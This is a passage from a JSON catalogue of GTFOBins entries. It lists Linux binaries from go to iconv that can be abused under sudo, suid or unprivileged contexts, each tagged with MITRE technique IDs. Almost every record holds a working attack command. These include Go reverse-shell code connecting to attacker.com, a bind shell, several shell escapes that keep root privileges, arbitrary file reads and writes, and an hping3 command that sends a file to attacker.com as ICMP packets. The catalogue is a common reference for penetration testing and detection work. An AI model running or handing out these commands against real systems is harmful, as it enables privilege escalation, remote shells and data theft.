1)\\n\\tsyscall.Dup2(nfd, 2)\\n\\tsyscall.Exec(\"/bin/sh\", []string{\"/bin/sh\", \"-i\"}, os.Environ())\\n}' >/path/to/temp-file.go\ngo run /path/to/temp-file.go","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/go/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:go:bind-shell:0:unprivileged","toolId":"gtfo:go","toolName":"go","name":"bind-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["bind-shell"],"command":"echo -e 'package main\\nimport (\\n\\t\"os\"\\n\\t\"syscall\"\\n)\\n\\nfunc main(){\\n\\tfd, _ := syscall.Socket(syscall.AF_INET, syscall.SOCK_STREAM, 0)\\n\\taddr := &syscall.SockaddrInet4{Port: 12345}\\n\\tcopy(addr.Addr[:], []byte{0,0,0,0})\\n\\tsyscall.Bind(fd, addr)\\n\\tsyscall.Listen(fd, 1)\\n\\tnfd, _, _ := syscall.Accept(fd)\\n\\tsyscall.Dup2(nfd, 0)\\n\\tsyscall.Dup2(nfd, 1)\\n\\tsyscall.Dup2(nfd, 2)\\n\\tsyscall.Exec(\"/bin/sh\", []string{\"/bin/sh\", \"-i\"}, os.Environ())\\n}' >/path/to/temp-file.go\ngo run /path/to/temp-file.go","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/go/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:go:file-read:0:sudo","toolId":"gtfo:go","toolName":"go","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"echo -e 'package main\\nimport (\\n\\t\"fmt\"\\n\\t\"os\"\\n)\\n\\nfunc main(){\\n\\tb, _ := os.ReadFile(\"/path/to/input-file\")\\n\\tfmt.Print(string(b))\\n}' >/path/to/temp-file.go\ngo run /path/to/temp-file.go","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/go/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:go:file-read:0:unprivileged","toolId":"gtfo:go","toolName":"go","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"echo -e 'package main\\nimport (\\n\\t\"fmt\"\\n\\t\"os\"\\n)\\n\\nfunc main(){\\n\\tb, _ := os.ReadFile(\"/path/to/input-file\")\\n\\tfmt.Print(string(b))\\n}' >/path/to/temp-file.go\ngo run /path/to/temp-file.go","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/go/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:go:file-write:0:sudo","toolId":"gtfo:go","toolName":"go","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo -e 'package main\\nimport \"os\"\\nfunc main(){\\n\\tf, _ := os.OpenFile(\"/path/to/output-file\", os.O_RDWR|os.O_CREATE, 0644)\\n\\tf.Write([]byte(\"DATA\\\\n\"))\\n\\tf.Close()\\n}' >/path/to/temp-file.go\ngo run /path/to/temp-file.go","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/go/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:go:file-write:0:unprivileged","toolId":"gtfo:go","toolName":"go","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo -e 'package main\\nimport \"os\"\\nfunc main(){\\n\\tf, _ := os.OpenFile(\"/path/to/output-file\", os.O_RDWR|os.O_CREATE, 0644)\\n\\tf.Write([]byte(\"DATA\\\\n\"))\\n\\tf.Close()\\n}' >/path/to/temp-file.go\ngo run /path/to/temp-file.go","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/go/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:go:reverse-shell:0:sudo","toolId":"gtfo:go","toolName":"go","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"echo -e 'package main\\nimport (\\n\\t\"os\"\\n\\t\"net\"\\n\\t\"syscall\"\\n)\\n\\nfunc main(){\\n\\tfd, _ := syscall.Socket(syscall.AF_INET, syscall.SOCK_STREAM, 0)\\n\\tip := net.ParseIP(\"attacker.com\").To4()\\n\\taddr := &syscall.SockaddrInet4{Port: 12345}\\n\\tcopy(addr.Addr[:], ip)\\n\\tsyscall.Connect(fd, addr)\\n\\tsyscall.Dup2(fd, 0)\\n\\tsyscall.Dup2(fd, 1)\\n\\tsyscall.Dup2(fd, 2)\\n\\tsyscall.Exec(\"/bin/sh\", []string{\"/bin/sh\", \"-i\"}, os.Environ())\\n}' >/path/to/temp-file.go\ngo run /path/to/temp-file.go","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/go/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:go:reverse-shell:0:unprivileged","toolId":"gtfo:go","toolName":"go","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"echo -e 'package main\\nimport (\\n\\t\"os\"\\n\\t\"net\"\\n\\t\"syscall\"\\n)\\n\\nfunc main(){\\n\\tfd, _ := syscall.Socket(syscall.AF_INET, syscall.SOCK_STREAM, 0)\\n\\tip := net.ParseIP(\"attacker.com\").To4()\\n\\taddr := &syscall.SockaddrInet4{Port: 12345}\\n\\tcopy(addr.Addr[:], ip)\\n\\tsyscall.Connect(fd, addr)\\n\\tsyscall.Dup2(fd, 0)\\n\\tsyscall.Dup2(fd, 1)\\n\\tsyscall.Dup2(fd, 2)\\n\\tsyscall.Exec(\"/bin/sh\", []string{\"/bin/sh\", \"-i\"}, os.Environ())\\n}' >/path/to/temp-file.go\ngo run /path/to/temp-file.go","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/go/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:go:shell:0:sudo","toolId":"gtfo:go","toolName":"go","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo -e 'package main\\nimport \"syscall\"\\nfunc main(){\\n\\tsyscall.Exec(\"/bin/sh\", []string{\"/bin/sh\", \"-i\"}, []string{})\\n}' >/path/to/temp-file.go\ngo run /path/to/temp-file.go","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/go/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:go:shell:0:unprivileged","toolId":"gtfo:go","toolName":"go","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo -e 'package main\\nimport \"syscall\"\\nfunc main(){\\n\\tsyscall.Exec(\"/bin/sh\", []string{\"/bin/sh\", \"-i\"}, []string{})\\n}' >/path/to/temp-file.go\ngo run /path/to/temp-file.go","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/go/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:grc:shell:0:sudo","toolId":"gtfo:grc","toolName":"grc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"grc --pty /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/grc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:grc:shell:0:unprivileged","toolId":"gtfo:grc","toolName":"grc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"grc --pty /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/grc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:grep:file-read:0:sudo","toolId":"gtfo:grep","toolName":"grep","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"grep '' /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/grep/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:grep:file-read:0:suid","toolId":"gtfo:grep","toolName":"grep","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"grep '' /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/grep/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:grep:file-read:0:unprivileged","toolId":"gtfo:grep","toolName":"grep","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"grep '' /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/grep/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gtester:file-write:0:sudo","toolId":"gtfo:gtester","toolName":"gtester","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"gtester DATA -o /path/to/output-file","description":"Data to be written appears in an XML attribute in the output file (`<testbinary path=\"DATA\">`).","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gtester/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gtester:file-write:0:suid","toolId":"gtfo:gtester","toolName":"gtester","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"gtester DATA -o /path/to/output-file","description":"Data to be written appears in an XML attribute in the output file (`<testbinary path=\"DATA\">`).","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/gtester/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gtester:file-write:0:unprivileged","toolId":"gtfo:gtester","toolName":"gtester","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"gtester DATA -o /path/to/output-file","description":"Data to be written appears in an XML attribute in the output file (`<testbinary path=\"DATA\">`).","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gtester/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gtester:shell:0:sudo","toolId":"gtfo:gtester","toolName":"gtester","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'exec /bin/sh 0<&1' >/path/to/temp-file\nchmod +x /path/to/temp-file\ngtester -q /path/to/temp-file","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gtester/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gtester:shell:0:suid","toolId":"gtfo:gtester","toolName":"gtester","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '#!/bin/sh -p' >/path/to/temp-file\necho 'exec /bin/sh -p 0<&1' >>/path/to/temp-file\nchmod +x /path/to/temp-file\ngtester -q /path/to/temp-file","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/gtester/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gtester:shell:0:unprivileged","toolId":"gtfo:gtester","toolName":"gtester","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo 'exec /bin/sh 0<&1' >/path/to/temp-file\nchmod +x /path/to/temp-file\ngtester -q /path/to/temp-file","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gtester/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:guile:shell:0:sudo","toolId":"gtfo:guile","toolName":"guile","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"guile -c '(system \"/bin/sh\")'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/guile/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:guile:shell:0:suid","toolId":"gtfo:guile","toolName":"guile","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"guile -c '(system \"/bin/sh\")'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/guile/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:guile:shell:0:unprivileged","toolId":"gtfo:guile","toolName":"guile","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"guile -c '(system \"/bin/sh\")'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/guile/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gzip:file-read:0:capabilities","toolId":"gtfo:gzip","toolName":"gzip","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"gzip -c /path/to/input-file | gzip -d","mitre":["T1005"],"privilege":"capabilities","context":"capabilities","references":["https://gtfobins.github.io/gtfobins/gzip/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gzip:file-read:0:sudo","toolId":"gtfo:gzip","toolName":"gzip","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"gzip -c /path/to/input-file | gzip -d","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gzip/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gzip:file-read:0:suid","toolId":"gtfo:gzip","toolName":"gzip","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"gzip -c /path/to/input-file | gzip -d","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/gzip/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gzip:file-read:0:unprivileged","toolId":"gtfo:gzip","toolName":"gzip","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"gzip -c /path/to/input-file | gzip -d","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gzip/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:hashcat:file-write:0:sudo","toolId":"gtfo:hashcat","toolName":"hashcat","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo -n DATA | tee /path/to/wordlist | md5sum | awk '{print $1}' >/path/to/hash\nhashcat -m 0 --quiet --potfile-disable -o /path/to/output-file --outfile-format=2 --outfile-autohex-disable /path/to/hash /path/to/wordlist","description":"Append data to the end of the output file, creating if does not exist.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/hashcat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:hashcat:file-write:0:unprivileged","toolId":"gtfo:hashcat","toolName":"hashcat","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo -n DATA | tee /path/to/wordlist | md5sum | awk '{print $1}' >/path/to/hash\nhashcat -m 0 --quiet --potfile-disable -o /path/to/output-file --outfile-format=2 --outfile-autohex-disable /path/to/hash /path/to/wordlist","description":"Append data to the end of the output file, creating if does not exist.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/hashcat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:head:file-read:0:sudo","toolId":"gtfo:head","toolName":"head","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"head -c-0 /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/head/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:head:file-read:0:suid","toolId":"gtfo:head","toolName":"head","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"head -c-0 /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/head/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:head:file-read:0:unprivileged","toolId":"gtfo:head","toolName":"head","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"head -c-0 /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/head/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:hexdump:file-read:0:sudo","toolId":"gtfo:hexdump","toolName":"hexdump","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"hd /path/to/input-file","description":"The output is actually an hex dump.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/hexdump/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["hd"]},{"id":"gtfo:hexdump:file-read:0:suid","toolId":"gtfo:hexdump","toolName":"hexdump","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"hd /path/to/input-file","description":"The output is actually an hex dump.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/hexdump/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["hd"]},{"id":"gtfo:hexdump:file-read:0:unprivileged","toolId":"gtfo:hexdump","toolName":"hexdump","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"hd /path/to/input-file","description":"The output is actually an hex dump.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/hexdump/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["hd"]},{"id":"gtfo:hg:shell:0:sudo","toolId":"gtfo:hg","toolName":"hg","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"hg --config alias.x='!/bin/sh' x","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/hg/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:hg:shell:0:suid","toolId":"gtfo:hg","toolName":"hg","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"hg --config alias.x='!/bin/sh' x","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/hg/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:hg:shell:0:unprivileged","toolId":"gtfo:hg","toolName":"hg","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"hg --config alias.x='!/bin/sh' x","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/hg/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:highlight:file-read:0:sudo","toolId":"gtfo:highlight","toolName":"highlight","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"highlight --no-doc --failsafe /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/highlight/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:highlight:file-read:0:suid","toolId":"gtfo:highlight","toolName":"highlight","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"highlight --no-doc --failsafe /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/highlight/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:highlight:file-read:0:unprivileged","toolId":"gtfo:highlight","toolName":"highlight","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"highlight --no-doc --failsafe /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/highlight/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:hping3:shell:0:sudo","toolId":"gtfo:hping3","toolName":"hping3","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"hping3\n/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/hping3/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:hping3:shell:0:suid","toolId":"gtfo:hping3","toolName":"hping3","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"hping3\n/bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/hping3/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:hping3:shell:0:unprivileged","toolId":"gtfo:hping3","toolName":"hping3","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"hping3\n/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/hping3/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:hping3:upload:0:sudo","toolId":"gtfo:hping3","toolName":"hping3","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"hping3 attacker.com --icmp --data 999 --sign xxx --file /path/to/input-file","description":"The file is continuously sent as ICMP packets (e.g., of `999` bytes), the optional `--end` parameter signals when the file reached the end.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/hping3/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:iconv:file-read:0:sudo","toolId":"gtfo:iconv","toolName":"iconv","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"iconv -f 8859_1 -t 8859_1 /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/iconv/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:iconv:file-read:0:suid","toolId":"gtfo:iconv","toolName":"iconv","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"iconv -f 8859_1 -t 8859_1 /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/iconv/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:iconv:file-read:0:unprivileged","toolId":"gtfo:iconv","toolName":"iconv","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"iconv -f 8859_1 -t 8859_1 